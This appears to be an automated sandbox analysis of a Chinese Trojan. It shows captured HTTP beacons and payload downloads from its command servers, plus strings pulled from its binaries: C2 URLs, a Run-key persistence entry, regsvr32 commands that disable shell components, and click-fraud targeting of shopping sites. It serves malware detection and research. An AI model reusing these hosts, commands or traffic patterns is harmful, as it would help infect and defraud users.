CF-RAY: 307cb44187614efc-DME
PK........h4.F%h1_..8..:......QtGui4.dllUT.....KU%.SW%.SW.\}t.U.......
....!bs(fph.V.$c...4IFB.:..I......d.....l?R........cV.....z..3...d@d&l
t;3..t...[.8...ap....Uuw..Ju.....T.z.{...~...U...I2..b..".B....CL.Y...
.w."o..?.....y5m.~.l....-..:.5.w....]..-[.sn.....v....u.....t..{/.....
...<..............ano'\............g...4;{.f....n...z_...9:......Z.
a]...UA\AH.e*...\.}v....a..!\=!.o..r.V.........>...0.V..W..d.N...C.
..P"....e...%{..$;..D\.......c...UO...G7..6.9.....;Z.u.U.V....&...1.oi
i.h....i..p..38...X.....Q........q}...p.:..t.$.U{s{2.-..6...x:......&.
.......rA.Wx..:p..)^..O.p...!.9....~....O....N.&_.?..q.....>.......
<..I.|Xi.6...t....\...]..H...e.._).2..~.B.*.a.:.X.=V.:..t!.......ps
.~.ydH.R.....#..9..y:..)..Dz......:...`.-..p........dm...K.>.@.=.b.
.C.(Y.=....f..^....3...^..&@3j(%.......C9.....c/...7......C@0\N.`.....
....y..%..-./n.....R.....{.IR...<........F[t...(..o>=.V..Z......
......j....m`xL=.-...~.q..i....N9.8p.t|.........6..?....@.u....\B..kg.
..m.c....3..xl....T...p......?.?(Oyj... .K..["....r.;...W.......*...`e
...|..1.*_.........<..`..B..p..)G..3....p..M.0......8....-...3@....
.r..r.K...a.$~.,..,.o.-....../.z.L..8P'.O8.?.u|B.....&c...Q.).qBJx.. .
^.......#.N..xx.?.q.A.2B.....{..f...#...q.4S<..g....o...xE4^.<..
.Fo....'..-A....f.7.....A`...e...1-p... .....(/H....;.?2.c.>...x.9.
...)....=.s....g.....rp........R.P5..NL......DG..%..wVC.P.........H$4h
./._P.F.........-.e4`......'^.#...i...d......XqB.'..6..@..A...@.....k/
.6$.....-.e@.?.Nu<.'.w..|P.rx`..?.A4El........gts.:_...9..u....

<<< skipped >>>

POST /ClientAPI/flowtaskAPIV1.aspx?ran=180620906 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 6688.9935.org
Content-Length: 327
Cache-Control: no-cache

parems=40C524F39289042EF1ABB79032A1E422205421157EC3ED09E1C8698158D262D73F61B51CA1976787843B294C2383FDFCB270FA24A917BCB956AB016616237AF06493047041B1EBD04FF9CBA79FD40F9C13D86FD1D2D144098075C78E089441DBD569496D04E69E9F2D11A4A6F6983007650899305D2EC9AAFA9DA6E12C796BD29E69A2907F0E1075581D12A83F0D4D4BFC509FC746825AC176AEECB1C75329AE
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 496
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 26 Nov 2016 10:37:19 GMT
47CF36AB6551793C8921CCC86BCCD08FA850026566EB5FED459973AA7B6D25502C474A
F448468EC924A1193ED5198DC0BB26F3C5F49AA51DD5D100E1DCB1251E7697F273E27F
01CDE2FBC9E352FDD8596353643F1CA544A3C3B0A0F012D5566CF5B60221927E6441E6
A70DB34DA14ABF5E374AEC21E0F775C2468EFEC74E2E75F4DC9E783F388FF13651F6B2
CEA23F7E1A0AC42634FD682ED299DAAE70A6A41FB2F1DF65F836501CEE909B7C2757AB
9F0CB5F9A3DCDB9172372B05526FCE8CC20592B35F084E4A14F2C6B35ABE2F5585531C
C2AE94F7C809415F20A9654EAF79BC981C8796B268CA64985697D6C6C4C6D6DDD13A67
B67CADHTTP/1.1 200 OK..Cache-Control: private..Content-Length: 496..Co
ntent-Type: text/html; charset=utf-8..Server: Microsoft-IIS/8.5..X-Asp
Net-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 26 Nov 2016
10:37:19 GMT..47CF36AB6551793C8921CCC86BCCD08FA850026566EB5FED459973AA
7B6D25502C474AF448468EC924A1193ED5198DC0BB26F3C5F49AA51DD5D100E1DCB125
1E7697F273E27F01CDE2FBC9E352FDD8596353643F1CA544A3C3B0A0F012D5566CF5B6
0221927E6441E6A70DB34DA14ABF5E374AEC21E0F775C2468EFEC74E2E75F4DC9E783F
388FF13651F6B2CEA23F7E1A0AC42634FD682ED299DAAE70A6A41FB2F1DF65F836501C
EE909B7C2757AB9F0CB5F9A3DCDB9172372B05526FCE8CC20592B35F084E4A14F2C6B3
5ABE2F5585531CC2AE94F7C809415F20A9654EAF79BC981C8796B268CA64985697D6C6
C4C6D6DDD13A67B67CAD..


GET /update/107872/update/update_stworker.txt?rnd=1480156597 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: update.ttliuliang.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 26 Nov 2016 10:36:42 GMT
Content-Type: text/plain
Content-Length: 263
Connection: keep-alive
Set-Cookie: __cfduid=d4bc30d1eb681bcaa0da9adc1517b61bd1480156602; expires=Sun, 26-Nov-17 10:36:42 GMT; path=/; domain=.ttliuliang.com; HttpOnly
Content-Encoding: gzip
Last-Modified: Wed, 14 Sep 2016 02:39:26 GMT
Accept-Ranges: bytes
ETag: "2552e43531ed21:0"
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 307cb36c355c4f38-DME
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"........._..............1......
...{....?..x|z....{....<9.}.....{'.................X..I.N....k|....
..<.......O...}.....O.....9~vz......'.>}. .W....dNg.....
.
...



GET /update/107872/update/1_0_ttbrowser.exe.zip?rnd=1480156603 HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: update.ttliuliang.com
Connection: Keep-Alive
Cookie: __cfduid=d4bc30d1eb681bcaa0da9adc1517b61bd1480156602


HTTP/1.1 200 OK
Date: Sat, 26 Nov 2016 10:36:43 GMT
Content-Type: application/x-zip-compressed
Content-Length: 12576077
Connection: keep-alive
Last-Modified: Wed, 14 Sep 2016 02:33:45 GMT
Accept-Ranges: bytes
ETag: "fcc8716a30ed21:0"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 307cb37144654f38-DME
PK.........T.I...5............ttbrowser.exeUT......W...W...V.|k`T.....
a..3.DQQ...XJ.Zt._.L.^Gg&.L.0.w..E.g. ..0....K-Ql.W-m..UzE..#/2.B....P
.5..f....$r...>g..d.x{...2...X{...Z{......\2I.d..."I... .N.g1H.....
(.-.~A............k..~..?*.........uoqmd~....g.RY.....w.....Ra.x.. ...
K.h..L........K.......|{.G.L..X.9<....%I.s...%.-...%[..Z.....=}...B
....qI.M..R.3.A-.O2....I.yF.4R..G@..^......^.H....R.....f............
.HO..p.R.%../@...t...4......}.x..>z...{...y...@.i5g.)..;...sg.NI.d.
A......Y.......T........4..k.Z.P...N....8..y$..{.......&@.]...(W>..
....Gw~.h.^H.....#.....$.....}..}.>......a....r..i.R'..Y2..$.(..S.]
.C.0.;;.R......Z.T...0.=S. ......Gg...U.O..N...%.:.\..E.;o....gI..=...
=..4v@v....o....C..6..k.s.. ..6 ..5...u...........cU..{....m...i.O...&
f..A..m...S..drV......c.....y..35|.IKe ....=..$......a>...g}.!VeM..
(..=...d.....u.Jx...........C......c....[XB.......U......B.....V._`J..
.(E. .BR2BA....!R.}.*..s...Ro....D....mt.=^.d ..U4...U....t6?4>..$q
%....%...CF6.S.^.pTF.....y.F.O.....J...=..M.V....X...-.$....x.}n.D6..l
......u..:...0.&..M.-ag...../..B..k.\....N..h E/Cs....A.....F..N(/.@.w
.........)v4^..f.h.-z...3K.\..9.........m{w...wn]pz.q...fy.Y...c6.Wi.|
.!..vv,8..>..gjH...].....^...p.\.......0?.1..........D.'...../...i.
.(.Z.`...Q.....].....].........c...l^..CX...}........g..G..j7./..M..H.
;........5R..aCCVA.i..^ ..!3m..:..^(.d....ti.]..,B..[........V.......u
A...Q...}:......U. h......[...P|.h">..@...^{. h7. y.....H..G..A0...
.9..,......*e..oa..JD.m.U.*;.L .L........0:M..M7|.(...U..|...Q.u6n

<<< skipped >>>

GET /gj/ver.txt HTTP/1.1
Accept: */*
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: down.9935.org


HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Sat, 26 Nov 2016 10:41:26 GMT
Content-Length: 1163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=gb2312"/>..<title>404 - ..
................</title>..<style type="text/css">..<!--
..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,
sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} .
.h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0
;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;
} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family
:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#55
5555;}..#content{margin:0 0 0 2%;position:relative;}...content-contain
er{background:#FFF;width:96%;margin-top:8px;padding:10px;position:rela
tive;}..-->..</style>..</head>..<body>..<div i
d="header"><h1>..........</h1></div>..<div id=
"content">.. <div class="content-container"><fieldset>.
. <h2>404 - ..................</h2>.. <h3>........
..............................................</h3>.. </field
set></div>..</div>..</body>..</html>....


GET /rj/flowtips.html HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.4345.cc
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Fri, 25 Nov 2016 07:12:22 GMT
Accept-Ranges: bytes
ETag: "0fb44eb46d21:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 26 Nov 2016 10:36:38 GMT
Content-Length: 1804
...........X{O.W...H.....@.=6...Z..*HI........s...f.3c.....K..V....KH.
...bS7..v.d.m.y.D."..}.......@..{...s~..k{..u.....)*......;.twR..M_h..
....u......iwP~...N.D..i......RU.E..H..i..r...I.",'2..6.digU..;z..O...
...........e.........m..07..t............'.E..*...T ...P....fg.......&
lt;... .8.`-=1.....)...T.u.H_X. .....].... G...!N.wwyY1......@=......f
..9...o.=.n............. .H&ISYr.c..I.\...\0..d-e.....I.jBd8..M..fOD.B
...\.)..=.W.z@.y....=...W@..n*|...Cl<...w......._..3^.AFV!.%o....V.
.....]..]Q.x`..~./F.z....K.cY X...xAf ............B$GUq...9H..h.z...W.
T...... ...o..j..oHg=ZZ..c.U(.]..j.fE...$.....#H^.i.....[..."......A..
IX....a..].c.o.5@.P.sB......&Q(W..IDu....bX...R..wi..Xl...#w.Q".0.n.y.
."..;.&. `.:.2]....@..&..g..r....De..s...@'k..|n..r.....h..V.(..|.....
.........yBX=..=;.R.Tz..v.9..*..Fz.2../7...E........B..g..&.(.r.....l4
.&.JD.2..bP......s...4q...Xi.X:.f.....3.c..aY..\W.......;c..v.H<...
h.Y..oh...U[..u.q.....s.]..y.....2.,....8#...i:LF..>.P....B.!......
~.5.6m.RI....L......t..6x......]....B.N........._.......!.........b./.
.!H.1G.V......3.....f.y&.6.h1aU4.....f.(.@.P. ..<.R......r......,..
...y....;....@B......>.AkS.....l1mEt.^.... .....\PpQ..>N.g@..!..
...O6....D.......s.......K~.........]H..j\.]..1.==]...D..%T.....@.....
.u.0zEv.........~ .~....7..Zd.....|..(...... ....f...w.w.^.<...y?79
...........{[,>...2UHj.. kk[.h,.....CC....^$.I....t,>..on...L|..
.....x8.|s....mDg....3.."............#.i....8Z.ww.Sogvr...9...t...k;..
.d....z.p..[S.f.....?.rm..o..1C....L...]x.....Xf.........yr.b4....

<<< skipped >>>

POST /ClientAPI/StatisticsUserAPI.aspx?ran=1763564114 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x1.2466.cc
Content-Length: 303
Cache-Control: no-cache

parems=eyJjb2RlIjoiRkFGNUI5QzkzMDAxREU2QzYwRDREOTYwMzAzQzREODgiLCJkYXRlZmlyc3QiOiIyMDE2LTExLTI2IDEyOjM2OjU5IiwiZXhlYyI6InRyYW5zZmVyX2NsaWVudHMiLCJmbG93dHMiOjMsImdldHRhc2tsYXN0dGltZSI6IiIsImlkIjoiNzMyMTk2IiwiaXAiOiIxOTQuMjQyLjk2LjIxOCIsInNyYyI6ImVjZjU3NDAwZSIsInR5cGUiOiJndWFqaSIsInZlcnNpb24iOiIxNDA4In0K
HTTP/1.1 200 OK
Cache-Control: private,no-cache
Pragma: no-cache
Content-Length: 1
Content-Type: text/html; charset=utf-8
Expires: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 26 Nov 2016 10:37:09 GMT
1HTTP/1.1 200 OK..Cache-Control: private,no-cache..Pragma: no-cache..C
ontent-Length: 1..Content-Type: text/html; charset=utf-8..Expires: 0..
Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By:
ASP.NET..Date: Sat, 26 Nov 2016 10:37:09 GMT..1..


GET / HTTP/1.1
Accept: */*
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: VVV.ip138.com


HTTP/1.1 200 OK
Date: Sat, 26 Nov 2016 03:48:36 GMT
Content-Length: 18658
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Tue, 01 Nov 2016 11:27:18 GMT
Accept-Ranges: bytes
ETag: "d2b8ace73234d21:13856"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 24505
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..
<html>..<head>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<meta name="mobile-agent"content=
"format=html5; url=hXXp://m.ip138.com/">..<title>IP........--
.................. | ............ | ............ | ...................
.....</title>..<meta name="Keywords" content="ip,IP....,IP...
.....,ip138">..<meta name="Description" content="ip,IP....,IP...
.....,ip138">..<script language="javascript">..<!--..if(wi
ndow.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com/'
;..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip
.value;...if (ip.indexOf(" ")>=0){3....ip = ip.replace(/ /g,"");...
.document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("ht
tp://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...
}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);
....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/
"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;
...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|
(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)|(at)|(au)|(aw
)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(bid)|(biz)|(bj)
|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|(cc)|(cd)|(cf)
|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(co)|(co\.in)|(co\.
nz)|(co\.uk)|(com)|(com\.ag)|(com\.br)|(com\.bz)|(com\.cn)|(com\.c

<<< skipped >>>

GET / HTTP/1.1

Accept: */*
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: VVV.ip138.com


HTTP/1.1 200 OK
Date: Sat, 26 Nov 2016 03:48:36 GMT
Content-Length: 18658
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Tue, 01 Nov 2016 11:27:18 GMT
Accept-Ranges: bytes
ETag: "d2b8ace73234d21:13856"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 24525
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..
<html>..<head>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<meta name="mobile-agent"content=
"format=html5; url=hXXp://m.ip138.com/">..<title>IP........--
.................. | ............ | ............ | ...................
.....</title>..<meta name="Keywords" content="ip,IP....,IP...
.....,ip138">..<meta name="Description" content="ip,IP....,IP...
.....,ip138">..<script language="javascript">..<!--..if(wi
ndow.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com/'
;..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip
.value;...if (ip.indexOf(" ")>=0){3....ip = ip.replace(/ /g,"");...
.document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("ht
tp://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...
}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);
....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/
"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;
...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|
(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)|(at)|(au)|(aw
)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(bid)|(biz)|(bj)
|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|(cc)|(cd)|(cf)
|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(co)|(co\.in)|(co\.
nz)|(co\.uk)|(com)|(com\.ag)|(com\.br)|(com\.bz)|(com\.cn)|(com\.c

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

LLVier.exe_3352:

.text
`.rdata
@.data
.rsrc
FtPh
.uAF;
<4,$?7/'
(3-!0,1'8"5.*2$
deflate 1.2.7 Copyright 1995-2012 Jean-loup Gailly and Mark Adler
1.2.7
inflate 1.2.7 Copyright 1995-2012 Mark Adler
MFC42.DLL
MSVCRT.dll
_acmdln
WinExec
KERNEL32.dll
RegisterHotKey
UnregisterHotKey
GetKeyState
GetAsyncKeyState
USER32.dll
GetViewportExtEx
GDI32.dll
RegCloseKey
RegCreateKeyA
RegOpenKeyA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEAUT32.dll
URLDownloadToFileA
urlmon.dll
MSVCP60.dll
SHLWAPI.dll
NETAPI32.dll
iphlpapi.dll
WINMM.dll
IMAGEHLP.dll
HttpQueryInfoA
FindCloseUrlCache
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
DeleteUrlCacheEntry
WININET.dll
VERSION.dll
%s\%s
hmflower.ini
m_dwHotKey
"%s" "%s" "wait=%d"
update_hmflower.txt
%s%d/update/
- V%s
1.0.04
hXXp://hf.haimarj.com/clnt/tips_flownews.htm
hXXp://hf.haimarj.com/?act=introduce
hXXp://hf.haimarj.com
hXXp://%s.%s/
haimasoft.com
haimarj.com
register.htm
[%d/%d]
%s.exe
HmFlowerApp_HOTKEY
&ip=%s
hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js
hXXp://ip.taobao.com/service/getIpInfo.php?ip=%s
apikey: a97c11bc9aa6b786403a2fa84a1cdcf4
hXXp://apis.baidu.com/apistore/iplookupservice/iplookup?ip=%s
hXXp://ip-api.com/json
hXXp://1212.ip138.com/ic.asp
hXXp://ip.chinaz.com/getip.aspx
hXXp://VVV.ip.cn/
xxxxxx
%d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d)
%d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE
\\.\PhysicalDrive%d
%d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
%s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
%d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE
\\.\Scsi%d:
%s^%s
%sX
[%d]%s
[%d]%s%s
%s:%u
hXXp://
hXXps://
%s_dddddd.log
%s.log
%s %s
{X-X-X-XX-XXXXXX}
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=%s
---------------------------%s
%s: %s
%s=%s
--%s--
; filename="%s"
Content-Disposition: form-data; name="%s"
.PAVCInternetException@@
[%u]%s
httpOnly
.PAVCException@@
hXXps://amos.im.alisoft.com/msg.aw?
hXXps://amos.alicdn.com/getcid.aw?
hXXps://VVV.taobao.com/webww
hXXps://amos1.taobao.com
hXXp://amos.im.alisoft.com/msg.aw?
hXXp://amos.alicdn.com/getcid.aw?
hXXp://VVV.taobao.com/webww
hXXp://amos1.taobao.com
hXXp://sighttp.qq.com
hXXp://wpa.qq.com
%s\%s\%s
%dd
http:
.gov.cn
.org.cn
.net.cn
.com.cn
%d.%d.%d.%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%Y-%m-%d %H:%M:%S
%Y-%m-%d
{%s-%d-%d-%d-%d-%s-%s}
%s%s=
UseSQLAPI
hXXp://sss12.banjia.la/ServerAPI.ashx?ation=ip&key=eGhkZmVlZGJhY2sInste&num=100
%s|%s|%s
[%u - %u]
[%d][%X]
browser\browser.exe
regsvr32 /u /s shell32.dll
regsvr32 /u /s wshext.dll
regsvr32 /u /s wshom.ocx
regsvr32 /s jscript.dll
IP[%s]
SHOPID_%s
ITEMID_%s
TASKID_%d
OBJ:%s
[%d,%d]
%d%s%s
%s%s%s%s
%d%s%s%s%s
%d%s%d%s%d%s%d%s%s%s%d
%s%d%s%d
&mode=%d
?act=%s&hostid=%s&clntid=%s&ver=%d&isclnt=1&r=%s
m_sCommonAlertMsg
d:00 ~ d:00
m_sShopID
m_nHourLimit
m_sURL
hXXp://VVV.paipai.com/
paipai.com
hXXp://VVV.yhd.com/
yhd.com
hXXp://VVV.jd.com/
jd.com
hXXp://VVV.1688.com/
1688.com
hXXps://VVV.tmall.com/
tmall.com
hXXps://VVV.taobao.com/
taobao.com
m_sKeyword2
m_sKeyword1
%d%s%d%s%d%s%d%s%s%s%s
"%s" "%s"
1/%d~1/%d
%d-%d
hXXp://a.m.taobao.com/i%s.htm
gome.com.cn
product.suning.com/
suning.com
item.jd.com/
detail.1688.com/offer/
.html
sellerNick:'
data-nick="
%d|%d|%d
update.txt
1_0_%s.zip
%s_old
rnd=%d
1.1.3
hXXp://VVV.baidu.com/
VVV.meilishuo.com/share/item/
meilishuo.com
shop.mogujie.com/detail/
mogujie.com
product.dangdang.com/
dangdang.com
item.gome.com.cn/
item.yhd.com/item/
item.m.jd.com/
auction1.paipai.com/
item.wanggou.com/
m.1688.com/offer/
detail.china.alibaba.com/offer/
detail.yao.95095.com/item.htm?
yao.95095.com
detail.m.tmall.com/item.htm?
h5.m.taobao.com/awp/core/detail.htm?
ju.mmstat.com/?url=hXXps://item.taobao.com/item.htm?
ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?
detail.tmall.com/item.htm?
item.taobao.com/item.htm?
%s_%s_%d_%d
|^href^prefix^hXXp://auction1.paipai.com/
|^href^prefix^hXXp://c.express.paipai.com/exp_click.fcg?
|^href^prefix^hXXp://item.wanggou.com/^,^|^href^prefix^hXXp://auction1.paipai.com/
|^href^prefix^hXXp://s.paipai.com/^,^&^text^whole^
KeyWord
|^href^prefix^hXXp://click.p4p.1688.com/ci_bb?
|^href^prefix^hXXp://s.1688.com/selloffer/^,^&^text^whole^
keywords
|^href^prefix^hXXp://detail.tmall.com/item.htm?
|^href^prefix^hXXp://detail.tmall.com/item.htm?^,^&^href^include^id=<@
|^href^prefix^hXXp://list.tmall.com/search_product.htm?^,^&^text^whole^
hXXp://VVV.tmall.com/
|^href^prefix^hXXp://item.taobao.com/item.htm?^,^|^href^prefix^hXXp://detail.tmall.com/item.htm?^,^|^href^prefix^hXXp://ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?^,^|^text^whole^
|^href^prefix^hXXp://click.simba.taobao.com/cc_im?
|^href^prefix^hXXp://item.taobao.com/item.htm?^,^|^href^prefix^hXXp://detail.tmall.com/item.htm?^,^&^href^include^id=<@
|^href^prefix^hXXp://s.taobao.com/search?^,^&^text^whole^
hXXp://VVV.taobao.com/
|^href^prefix^hXXp://cn.bing.com/search?q=^,^&^text^whole^
hXXp://cn.bing.com/
|^href^prefix^hXXp://VVV.sogou.com/bill_cpc?
|^href^prefix^hXXp://VVV.soso.com/q?query=^,^&^text^whole^
hXXp://VVV.soso.com/
|^href^prefix^hXXp://e.tf.360.cn/search/eclk?
|^href^prefix^hXXp://VVV.so.com/s?^,^&^text^whole^
hXXp://VVV.so.com/
|^href^prefix^hXXp://VVV.baidu.com/baidu.php?url=
|^href^prefix^hXXp://VVV.baidu.com/link?url=
|^href^prefix^hXXp://VVV.baidu.com/s?wd=^,^&^text^whole^
"/""/""/""
version="5.1.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
d\StringFileInfo\xx\%s
msctls_hotkey32
HotKey1
STWorker.Document
1, 0, 0, 1
HMFlower.EXE

setmss.exe_3368:

.text
`.rdata
@.data
.rsrc
@.reloc
.uUF;
f;T$.uBf
FTPj
FTPR
tFHt:Ht.Ht"Hu`
t'SShl
9>t.hT
FTPS
j%XtL9E
QSShlP
tWSShW
tl9_ tgSSh
SSSSh
tAHt.HHt
u$SShe
@ SSHPWj
FtPW
SSh@B
FTCP
u.Ph<
<SShG
diu2.iu
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
CNotSupportedException
user32.dll
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
comctl32.dll
comdlg32.dll
shell32.dll
mfcm100.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
CHttpConnection
CHttpFile
hXXp://
HTTP/1.0
CHotKeyCtrl
msctls_hotkey32
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
kernel32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
RegOpenKeyTransactedA
Advapi32.dll
RegDeleteKeyTransactedA
CMDIChildWnd
CMDIFrameWnd
File%d
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
RegCreateKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Shell32.dll
%s:%x:%x:%x:%x
%s\shell\open\%s
%s\shell\print\%s
%s\shell\printto\%s
%s\DefaultIcon
%s\ShellNew
ddeexec
CMDITabProxyWnd
CMDIChildWndEx
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
&%d %s
RegDeleteKeyExA
lXXxXXXXXXXX
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
ole32.dll
{8895b1c6-b41f-4c1c-a562-0d564250836f}
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers
%s\ShellEx\%s
MFCLink_UrlPrefix
MFCLink_Url
CMDIFrameWndEx
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
